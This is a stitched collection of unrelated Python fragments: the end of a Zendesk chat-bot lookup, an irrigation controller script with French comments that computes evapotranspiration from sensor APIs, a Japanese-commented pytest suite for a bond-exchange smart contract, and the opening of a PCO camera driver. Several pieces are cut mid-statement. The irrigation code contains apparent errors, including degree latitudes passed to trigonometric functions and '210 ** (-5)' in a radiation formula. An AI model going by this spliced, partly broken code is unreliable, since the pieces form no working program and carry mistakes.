"{'results': [], 'facets': None, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat(
"This user does not exist on Zendesk, the name is misspelled or does not belong to this organisation.")
elif str(results).startswith(
"{'results': [], 'facets': {'type': {'entry': 0, 'ticket': 0, 'organization': 0, 'user': 0, 'article': 0, 'group': 0}}, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat(
"This organisation/company does not exist in Zendesk or name is misspelled.")
else:
data = json.dumps(results, indent=2)
d = json.loads(data)
for index in range(len(d["results"])):
# name = d["results"][index]["name"]
# email = str(d["results"][index]["email"])
role = str(d["results"][index]["role"])
# print(role)
#botlog.LogSymphonyInfo("The calling user is a Zendesk " + role)
if | |
<filename>gw1/wat1.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from datetime import datetime,date
import time
import calendar
import json
import math
import os,sys
import socket
import traceback
import urllib2 as urllib
user = "GW1"
test = False
if test:
host = "greenwall.gembloux.uliege.be"
else:
host = "localhost"
# Ensure to run in the user home directory
DIR_BASE = os.path.expanduser("~")
if not os.path.samefile(os.getcwd(), DIR_BASE):
os.chdir(DIR_BASE)
print(os.getcwd())
# Ensure to be the only instance to run
pid = str(os.getpid())
_lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
_lock_socket.bind('\0'+user)
print('Socket '+user+' now locked for process #' + pid)
# Make the current pid available to be able to kill the process...
open("pid.txt", 'w').write(pid)
except socket.error:
current = open("pid.txt", 'r').read()
print(user+' lock exists for process #' + current + " : may be you should ./clean.sh !")
sys.exit()
# EPOCH time is the number of seconds since 1/1/1970
def get_timestamp():
return int(time.time())
# Transform an EPOCH time in a lisible date (for Grafana)
def formatDate(epoch):
dt = datetime.fromtimestamp(epoch)
return dt.isoformat()
# Transform an EPOCH time in a lisible date (for Grafana)
def formatDateGMT(epoch):
dt = datetime.fromtimestamp(epoch - (2 * 60 * 60) ) # We are in summer and in Belgium !
return dt.isoformat()
delimiters = ' \t\n\r\"\''
# Getting the list of all available sensors
dataFile = None
try: # urlopen not usable with "with"
url = "http://" +host +"/api/grafana/search"
dataFile = urllib.urlopen(url, json.dumps(""), 20)
result = json.load(dataFile)
for index in result:
print(index)
except:
print(u"URL=" + (url if url else "") + \
u", Message=" + traceback.format_exc())
if dataFile:
dataFile.close()
supplement_ET0=0
# Your program must create a data file with one column with the Linux EPOCH time and your valve state (0=closed, 1=opened)
while (True):
print("######## Nouvelle irrigation : " + time.strftime("%A %d %B %Y %H:%M:%S") + " ########") # indique qu'une nouvelle irrigation a eu lieu tel jour et à tel heure
print("")
# Recueil des dernières valeurs de tension des capteurs d'humidité
dataFile = None
humidite= [[] for b in range(2)] # liste stockant les dernières valeurs d'humidité avant puis après irrigation
for g in range(1, 4): # boucle collectant les 3 dernières valeurs de nos capteurs d'humidité
try: # urlopen not usable with "with"
url = "http://" + host + "/api/get/%21s_HUM" + unicode(g)
dataFile = urllib.urlopen(url, None, 20)
data = dataFile.read(80000)
humidite[0].append((float(data.strip(delimiters)))) # ajout de la valeur receuillie en fin de liste
except:
print(u"URL=" + (url if url else "") + \
u", Message=" + traceback.format_exc())
if dataFile:
dataFile.close()
# Conversion des tensions en teneur en eau puis trie de celles-ci par ordre croissant
for o in range(0, 3):
humidite[0][o] = ((35.24 * humidite[0][o] - 15.44) / (humidite[0][o] - 0.3747)) / 100
humidite[0].sort() # trie les valeurs d'humidité dans l'ordre croissant
affichage_capteurs=list(humidite[0]) # fait une copie pour permettre de rendre les valeurs à afficher plus lisibles tout en gardant les données d'origine
for k in range(0,3): # méthode qui transforme la valeur entre 0 et 1 en un pourcentage avec 4 chiffres après la virgule
affichage_capteurs[k]=round(affichage_capteurs[k]*100,4)
affichage_capteurs.sort()
print("Valeurs des capteurs d'humidité avant le test de qualité (%) : "+str(affichage_capteurs).strip('[]')) # affiche les valeurs de nos capteurs en pourcent
# Vérification des données d'humidité
t=0
if humidite[0][1]-humidite[0][0]>0.08 : # regarde si la différence entre la plus petite valeur et la valeur centrale est strictement supérieure à 8%
del humidite[0][0]
t=1
elif humidite[0][2]-humidite[0][1]>0.08:
del humidite[0][2]
t+=2
# Permet d'afficher le nombre de données supprimées
if t==3: # correspond à l'effacement de 2 données
z=2
elif t==2: # correspond à l'effacement du max mais ce n'est qu'une donnée
z=1
else:
z=t # sinon le t correspond au nombre de données supprimées
print("Capteurs défaillants : "+str(z)) # indique le nombre de capteurs qui nous semble défectueux
# Combien de valeurs reste-t-il ?
if t!=3:
moyenne_humidite=[sum(humidite[0])/len(humidite[0])]
supplement_ET0=0 # remet à 0 le complément d'irrigation si entre temps les sondes sont redevenues fonctionnelles
print("Plan effectué : plan A")
print("Teneur en eau moyenne avant irrigation : "+str(round(moyenne_humidite[0]*100,4))+" %")
# Où se situe l'humidité moyenne ?
if moyenne_humidite[0]>0.285: # regarde si elle est supérieure à la CC
V_irrigation=0 # y'a assez d'eau on n'irrigue pas
ET0=0
print("Volume irrigué : 0 mL")
else:
V_irrigation = (0.285 - moyenne_humidite[0]) * 12.6 # volume d'irrigation nécessaire pour atteindre la CC
print("Volume irrigué : "+str(int(V_irrigation*1000))+" mL")
else:
# Receuil des données météo des 24 dernières heures et nécessaires au calcul de l'ETP
dataFile = None
meteo = [[] for i in range(6)] # tableau permettant le stockage des valeurs receuillies
j = 0 # variable de changement de colonne dans le tableau
try: # urlopen not usable with "with"
url = "http://" + host + "/api/grafana/query"
now = get_timestamp()
gr = {'range': {'from': formatDateGMT(now - (24 * 60 * 60)), 'to': formatDateGMT(now)}, \
'targets': [{'target': 'SDI0'}, {'target': 'SDI4'}, {'target': 'SDI7'}, {'target': 'SDI8'},
{'target': 'SDI9'}, {'target': 'SDI10'}, ]}
data = json.dumps(gr)
dataFile = urllib.urlopen(url, data, 20)
result = json.load(dataFile)
if result:
for target in result:
index = target.get('target')
for datapoint in target.get('datapoints'):
value = datapoint[0]
stamp = datapoint[1] / 1000
meteo[j].append(
float(value)) # ajoute les données dans le tableau en dernière ligne de la colonne j
j += 1 # permet de passer à la colonne suivante
except:
print(u"URL=" + (url if url else "") + \
u", Message=" + traceback.format_exc())
if dataFile:
dataFile.close()
# Calcul de l'ETP des 24 dernières heures
ET0 = 0 # initialisation de la valeur de ET0
Kc = 1 # valeur du coefficient cultural
v = [] # variable permettant de trouver la taille de ma boucle for car sur 24h il se peut que l'on ne collecte pas exactement 1440 valeurs, cela évite donc de faire planter ma boucle for
for i in range(0, len(
meteo)): # stocke dans ma liste le nombre de données collectées sur l'heure précédente pour chaque capteur
v.append(len(meteo[i]))
for q in range(0, min(v)): # calcul de l'ET0 par minute avec les données précédemment collectées dans meteo
delta = (4098 * (0.6108 * math.exp((17.27 * meteo[2][q]) / (meteo[2][q] + 237.3)))) / (
(meteo[2][q] + 237.3) ** 2)
es = 100 * meteo[3][q] / meteo[5][q]
ea = meteo[3][q]
altitude = 106 # pour Mont-Saint-Guilbert (159 si Gembloux)
albedo = 0.2
Rs = meteo[0][q] * 10 ** (-6) * 60
Rns = (1 - albedo) * Rs
lat = 50
sigma = 4.903 * 10 ** (-9) / (24 * 60)
J = (date.today() - date(2020, 1,1)).days + 1 # représente le nombre de jours passés depuis le 1er janvier 2020 compris
dr = 1 + 0.033 * math.cos((6.28 / 365) * J)
declinaison = 0.409 * math.sin((6.28 / 365) * J - 1.39)
ws = math.acos(-math.tan(lat) * math.tan(declinaison))
Ra = (1/ 3.14) * 0.082 * dr * (ws * math.sin(lat) * math.sin(declinaison) + math.sin(ws) * math.cos(lat) * math.cos(declinaison))
Rso = (0.75 + 210 ** (-5) * altitude) * Ra
Rnl = sigma * (meteo[2][q] + 273.15) * (0.34 * 0.14 * ea ** 0.5) * (1.35 * (Rs / Rso) - 0.35)
Rn = Rns - Rnl
gamma = 0.665 * meteo[4][q] * 10 ** (-3)
vitesse_du_vent = meteo[1][q]
ET0 += (0.408 * delta * Rn + gamma * (0.625 / (273 + meteo[2][q])) * vitesse_du_vent * (es - ea)) / (delta + gamma * (1 + 0.34 * vitesse_du_vent)) # stocke la somme des ET0 calculés pour chaque minute
print("ET0 des 24 dernières heures "+str (ET0)+" mm")
if 0<ET0<9:
print("Pan effectué : plan B")
ETR = (ET0+supplement_ET0) * Kc # valeur réelle de l'ETP en considérant le type et le stade de la culture
V_irrigation = ETR * 10 ** (-2) * 10.5 # volume qui a été perdu par évapotranspiration
moyenne_humidite= [humidite[0]]
print("Volume irrigué : "+str(int(V_irrigation*1000))+" mL")
print("Teneur en eau moyenne avant irrigation : "+str(round(moyenne_humidite[0]*100,4))+" %")
else:
print("Plan effectué : plan C")
ET0=float(open("../WatWall/gw1/ET0.csv", 'r').read().split("\n")[J - 1]) # trouve la valeur moyenne d'ET0 pour aujourd'hui dans notre fichier
print("Nouvelle valeur d'ET0 : "+str(ET0))
ETR = (ET0+supplement_ET0) * Kc
V_irrigation = ETR * 10 ** (-2) * 10.5
| |
"""
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import pytest
from eth_utils import to_checksum_address
import utils
'''
共通処理
'''
# PersonalInfo登録
def personalinfo_register(personalinfo, trader, issuer):
message = 'some_message'
personalinfo.register.transact(issuer, message, {'from': trader})
# PaymentGatewayアカウント登録
def payment_gateway_register(payment_gateway, trader, agent):
message = 'some_message'
payment_gateway.register.transact(agent, message, {'from': trader})
# PaymentGatewayアカウント認可
def payment_gateway_approve(payment_gateway, trader, agent):
payment_gateway.approve.transact(trader, {'from': agent})
# Bondトークンを取引所にデポジット
def bond_transfer(bond_token, bond_exchange, trader, amount):
bond_token.transfer.transact(
bond_exchange.address, amount, {'from': trader})
'''
TEST_デプロイ
'''
# <正常系1>
# Deploy → 正常
def test_deploy_normal_1(users, bond_exchange, bond_exchange_storage,
personal_info, payment_gateway):
owner = bond_exchange.owner()
personal_info_address = bond_exchange.personalInfoAddress()
payment_gateway_address = bond_exchange.paymentGatewayAddress()
storage_address = bond_exchange.storageAddress()
assert owner == users['admin']
assert personal_info_address == to_checksum_address(personal_info.address)
assert payment_gateway_address == to_checksum_address(payment_gateway.address)
assert storage_address == to_checksum_address(bond_exchange_storage.address)
# <エラー系1>
# 入力値の型誤り(PaymentGatewayアドレス)
def test_deploy_error_1(users, IbetStraightBondExchange, personal_info):
exchange_owner = users['admin']
deploy_args = [
1234,
personal_info.address
]
with pytest.raises(ValueError):
exchange_owner.deploy(
IbetStraightBondExchange,
*deploy_args
)
# <エラー系2>
# 入力値の型誤り(PersonalInfoアドレス)
def test_deploy_error_2(users, IbetStraightBondExchange, payment_gateway):
exchange_owner = users['admin']
deploy_args = [
payment_gateway.address,
1234
]
with pytest.raises(ValueError):
exchange_owner.deploy(
IbetStraightBondExchange, *deploy_args)
'''
TEST_Make注文(createOrder)
'''
# 正常系1
# <発行体>新規発行 -> <投資家>新規注文(買)
def test_createorder_normal_1(users, bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文(買)
_amount = 100
_price = 123
_isBuy = True
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})
order_id = bond_exchange.latestOrderId()
orderbook = bond_exchange.getOrder(order_id)
assert orderbook == [
issuer.address, to_checksum_address(bond_token.address), _amount, _price,
_isBuy, agent.address, False
]
assert bond_token.balanceOf(issuer) == deploy_args[2]
# 正常系2
# <発行体>新規発行 -> <発行体>新規注文(売)
def test_createorder_normal_2(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# Exchangeへのデポジット
_amount = 100
bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
# 新規注文(売)
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})
order_id = bond_exchange.latestOrderId()
orderbook = bond_exchange.getOrder(order_id)
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert orderbook == [
issuer.address, to_checksum_address(bond_token.address), _amount, _price,
_isBuy, agent.address, False
]
assert balance == deploy_args[2] - _amount
assert commitment == _amount
# エラー系1
# 入力値の型誤り(_token)
def test_createorder_error_1(users, bond_exchange):
issuer = users['issuer']
agent = users['agent']
# 新規注文
_price = 123
_isBuy = False
_amount = 100
with pytest.raises(ValueError):
bond_exchange.createOrder.transact('1234', _amount, _price, _isBuy, agent, {'from': issuer})
with pytest.raises(ValueError):
bond_exchange.createOrder.transact(1234, _amount, _price, _isBuy, agent, {'from': issuer})
# エラー系2
# 入力値の型誤り(_amount)
def test_createorder_error_2(users, bond_exchange, personal_info):
issuer = users['issuer']
agent = users['agent']
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文
_price = 123
_isBuy = False
with pytest.raises(OverflowError):
bond_exchange.createOrder.transact(
bond_token.address, -1, _price, _isBuy, agent, {'from': issuer})
with pytest.raises(OverflowError):
bond_exchange.createOrder.transact(
bond_token.address, 2 ** 256, _price, _isBuy, agent, {'from': issuer})
with pytest.raises(TypeError):
bond_exchange.createOrder.transact(
bond_token.address, 'abc', _price, _isBuy, agent, {'from': issuer})
# エラー系3
# 入力値の型誤り(_price)
def test_createorder_error_3(users, bond_exchange, personal_info):
issuer = users['issuer']
agent = users['agent']
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文
_amount = 100
_isBuy = False
with pytest.raises(OverflowError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, -1, _isBuy, agent, {'from': issuer})
with pytest.raises(OverflowError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, 2 ** 256, _isBuy, agent, {'from': issuer})
with pytest.raises(TypeError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, 'abc', _isBuy, agent, {'from': issuer})
# エラー系4
# 入力値の型誤り(_isBuy)
def test_createorder_error_4(users, bond_exchange, personal_info):
issuer = users['issuer']
agent = users['agent']
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文
_amount = 100
_price = 123
with pytest.raises(ValueError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, 1234, agent, {'from': issuer})
with pytest.raises(ValueError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, 'True', agent, {'from': issuer})
# エラー系5
# 入力値の型誤り(_agent)
def test_createorder_error_5(users, bond_exchange, personal_info):
issuer = users['issuer']
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文
_price = 123
_isBuy = False
_amount = 100
with pytest.raises(ValueError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, '1234', {'from': issuer})
with pytest.raises(ValueError):
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, 1234, {'from': issuer})
# エラー系6-1
# 買注文数量が0の場合
def test_createorder_error_6_1(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文(買)
_amount = 0
_price = 123
_isBuy = True
bond_exchange.createOrder.transact(bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系6-2
# 売注文数量が0の場合
def test_createorder_error_6_2(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# Exchangeへのデポジット
_amount = 100
bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
# 新規注文(売)
_amount = 0
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系7-1
# 未認可のアカウントアドレスからの注文(買)
def test_createorder_error_7_1(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent) # 未認可状態
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文(買)
_amount = 100
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系7-2
# 未認可のアカウントアドレスからの注文(売)
def test_createorder_error_7_2(users,
bond_exchange, personal_info):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer) # 未認可状態
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# Exchangeへのデポジット
_amount = 100
bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
# 新規注文(売)
_amount = 0
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系8-1
# 名簿用個人情報が登録されていない場合(買注文)
def test_createorder_error_8_1(users,
bond_exchange, payment_gateway, personal_info):
issuer = users['issuer']
agent = users['agent']
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 新規注文(買)
_amount = 100
_price = 123
_isBuy = True
bond_exchange.createOrder.transact(bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系8-2
# 名簿用個人情報が登録されていない場合(売注文)
def test_createorder_error_8_2(users,
bond_exchange, payment_gateway, personal_info):
issuer = users['issuer']
agent = users['agent']
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# Exchangeへのデポジット
_amount = 100
bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
# 新規注文(売)
_amount = 100
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系9-1
# 償還済みフラグがTrueの場合
# <発行体>新規発行 -> <発行体>償還設定 -> <発行体>新規注文(買)
def test_createorder_error_9_1(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# 償還設定
bond_token.redeem.transact({'from': issuer})
# 新規注文(買)
_price = 123
_isBuy = True
_amount = 100
bond_exchange.createOrder.transact(bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系9-2
# 償還済みフラグがTrueの場合
# <発行体>新規発行 -> <発行体>償還設定 -> <発行体>新規注文(売)
def test_createorder_error_9_2(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# Exchangeへのデポジット
_amount = 100
bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
# 償還設定
bond_token.redeem.transact({'from': issuer})
# 新規注文(売)
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系10
# 残高不足
def test_createorder_error_10(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
payment_gateway_register(payment_gateway, issuer, agent)
payment_gateway_approve(payment_gateway, issuer, agent)
# 新規発行
bond_token, deploy_args = utils. \
issue_bond_token(users, bond_exchange.address, personal_info.address)
# Exchangeへのデポジット
_amount = 100
bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
# 新規注文(売)
_price = 123
_isBuy = False
bond_exchange.createOrder.transact(
bond_token.address, _amount + 1, _price, _isBuy, agent, {'from': issuer}) # エラーになる
commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
balance = bond_token.balanceOf(issuer)
assert balance == deploy_args[2]
assert commitment == 0
# エラー系11-1
# 無効な収納代行業者(Agent)の指定(買)
def test_createorder_error_11_1(users,
bond_exchange, personal_info, payment_gateway):
issuer = users['issuer']
agent = users['agent']
personalinfo_register(personal_info, issuer, issuer)
| |
<filename>pylablib/aux_libs/devices/PCO_SC2.py
from . import PCO_SC2_lib
from .PCO_SC2_lib import lib, PCOSC2LibError, named_tuple_to_dict
from ...core.devio.interface import IDevice
from ...core.utils import funcargparse, py3, dictionary, general
from ...core.dataproc import image as image_utils
_depends_local=[".PCO_SC2_lib","...core.devio.interface"]
import numpy as np
import collections
import contextlib
import ctypes
import time
import threading
class PCOSC2Error(RuntimeError):
"Generic PCO SC2 camera error."
class PCOSC2TimeoutError(PCOSC2Error):
"Timeout while waiting."
class PCOSC2NotSupportedError(PCOSC2Error):
"Option not supported."
def get_cameras_number():
"""Get number of connected PCOSC2 cameras"""
lib.initlib()
cams=[]
try:
while True:
cams.append(lib.PCO_OpenCamera(0))
except PCOSC2LibError:
pass
ncams=len(cams)
for c in cams:
try:
lib.PCO_CloseCamera(c)
except PCOSC2LibError:
pass
return ncams
def reset_api():
"""
Reset API.
All cameras must be closed; otherwise, the prompt to reboot will appear.
"""
lib.initlib()
lib.PCO_ResetLib()
class PCOSC2Camera(IDevice):
"""
PCO SC2 camera.
Args:
idx(int): camera index (use :func:`get_cameras_number` to get the total number of connected cameras)
reboot_on_fail(bool): if ``True`` and the camera raised an error during initialization (but after opening), reboot the camera and try to connect again
useful when the camera is in a broken state (e.g., wrong ROI or pixel clock settings)
"""
def __init__(self, idx=0, reboot_on_fail=True):
IDevice.__init__(self)
lib.initlib()
self.idx=idx
self.handle=None
self.reboot_on_fail=reboot_on_fail
self._full_camera_data=dictionary.Dictionary()
self._capabilities=[]
self._model_data=None
self._buffers=None
self._default_nframes=100
self._buffer_looping=False
self._buffer_loop_thread=None
self._next_wait_buffer=0
self._next_read_buffer=0
self._next_schedule_buffer=0
self._next_buffer=0
self._last_wait_frame=0
self.image_indexing="rct"
self.v=dictionary.ItemAccessor(lambda n:self._full_camera_data[n])
self.open()
self._nodes_ignore_error={"get":(PCOSC2NotSupportedError,),"set":()}
self._add_full_info_node("model_data",self.get_model_data)
self._add_full_info_node("capabilities",self.get_capabilities)
self._add_status_node("temperature_monitor",self.get_temperature)
self._add_settings_node("trigger_mode",self.get_trigger_mode,self.set_trigger_mode)
self._add_settings_node("exposure",self.get_exposure,self.set_exposure)
self._add_settings_node("frame_delay",self.get_frame_delay,self.set_frame_delay)
self._add_status_node("timings",self.get_timings)
self._add_settings_node("frame_time",self.get_frame_time,self.set_frame_time)
self._add_status_node("buffer_size",self.get_buffer_size)
self._add_status_node("buffer_status",self.get_buffer_status)
self._add_status_node("data_dimensions",self.get_data_dimensions)
self._add_settings_node("bit_alignment",self.get_bit_aligment,self.set_bit_aligment)
self._add_settings_node("hotpixel_correction",self.is_pixel_correction_enabled,self.enable_pixel_correction)
self._add_settings_node("noise_filter",self.get_noise_filter_mode,self.set_noise_filter_mode)
self._add_settings_node("status_line",self.get_status_line_mode,self.set_status_line_mode)
self._add_settings_node("metadata_mode",self.get_metadata_mode,self.set_metadata_mode)
self._add_settings_node("pixel_rate",self.get_pixel_rate,self.set_pixel_rate)
self._add_full_info_node("all_pixel_rates",self.get_available_pixel_rates)
self._add_full_info_node("conversion_factor",self.get_conversion_factor)
self._add_full_info_node("detector_size",self.get_detector_size)
self._add_settings_node("roi",self.get_roi,self.set_roi)
self._add_status_node("roi_limits",self.get_roi_limits)
self._add_status_node("acq_status",self.get_status)
self._add_status_node("acq_in_progress",self.acquisition_in_progress)
self._add_full_info_node("full_data",self.get_full_camera_data)
def open(self):
"""Open connection to the camera"""
for t in range(2):
self.handle=lib.PCO_OpenCamera(self.idx)
try:
self.update_full_data()
return
except:
if self.reboot_on_fail and t==0:
self.reboot()
else:
self.close()
raise
def close(self):
"""Close connection to the camera"""
if self.handle is not None:
try:
self.stop_acquisition()
except PCOSC2LibError:
pass
lib.PCO_CloseCamera(self.handle)
self.handle=None
def is_opened(self):
"""Check if the device is connected"""
return self.handle is not None
def reboot(self, wait=True):
"""
Reboot the camera.
If ``wait==True``, wait for the recommended time (10 seconds) after reboot for the camera to fully restart;
attempt to open the camera before that can lead to an error.
"""
if self.handle is not None:
lib.PCO_RebootCamera(self.handle)
lib.PCO_CloseCamera(self.handle)
if wait:
time.sleep(10.)
def get_full_camera_data(self):
"""Get a dictionary the all camera data available through the SDK."""
cam_data=dictionary.Dictionary()
for (i,name) in enumerate(["interface","camera","sensor","serial_number","fw_build","fw_rev"]):
cam_data["info_strings",name]=py3.as_str(lib.PCO_GetInfoString(self.handle,i))
cam_data["general"]=named_tuple_to_dict(lib.PCO_GetGeneral(self.handle),expand_lists=True)
cam_data["sensor"]=named_tuple_to_dict(lib.PCO_GetSensorStruct(self.handle),expand_lists=True)
cam_data["img_timing"]=named_tuple_to_dict(lib.PCO_GetImageTiming(self.handle),expand_lists=True)
cam_data["timing"]=named_tuple_to_dict(lib.PCO_GetTimingStruct(self.handle),expand_lists=True)
cam_data["storage"]=named_tuple_to_dict(lib.PCO_GetStorageStruct(self.handle),expand_lists=True)
cam_data["recording"]=named_tuple_to_dict(lib.PCO_GetRecordingStruct(self.handle),expand_lists=True)
cam_data["image"]=named_tuple_to_dict(lib.PCO_GetImageStruct(self.handle),expand_lists=True)
signal_num=len(cam_data["sensor/strSignalDesc"])
for k in list(cam_data["timing/strSignal"].keys()):
if int(k)>=signal_num:
del cam_data["timing/strSignal",k]
for k in list(cam_data["image/strSegment"].keys()):
if cam_data["image/strSegment",k,"dwMaxImageCnt"]==0:
del cam_data["image/strSegment",k]
return cam_data
def update_full_data(self):
"""
Update internal full camera data settings.
Takes some time (about 50ms), so more specific function are preferrables for specific parameters.
"""
self._arm()
self._full_camera_data=self.get_full_camera_data()
self._capabilities=self.get_capabilities()
self._model_data=self.get_model_data()
def _arm(self):
lib.PCO_ArmCamera(self.handle)
ModelData=collections.namedtuple("ModelData",["model","interface","sensor","serial_number"])
_interface_codes={1:"firewire",2:"camlink",3:"usb2",4:"gige",5:"serial",6:"usb3",7:"clhs"}
def get_model_data(self):
"""
Get camera model data.
Return tuple ``(model, interface, sensor, serial_number)``.
"""
intf=self._interface_codes.get(self.v["general/strCamType/wInterfaceType"],"unknown")
return self.ModelData(self.v["info_strings/camera"],intf,self.v["info_strings/sensor"],self.v["info_strings/serial_number"])
def _parse_flag_bits(self, value, desc):
result=set()
b=1
for v in desc:
if isinstance(v,tuple):
v,b=v
if value&b:
result.add(v)
b<<=1
return result
_caps_desc1=[ "noise_filter","hotpix_filter","hotpix_with_noise_only","timestamp_ascii_only",
"dataformat2x12","record_stop","hot_pixel_correction","no_extexpctl",
"no_timestamp","no_acq_mode","dataformat4x16","dataformat5x16",
"no_record","fast_timing","metadata","set_framerate",
"cdi_mode","ccm","ext_sync","no_global_shutter",
"global_reset_mode","ext_acq","fan_ctl","symm_vert_roi",
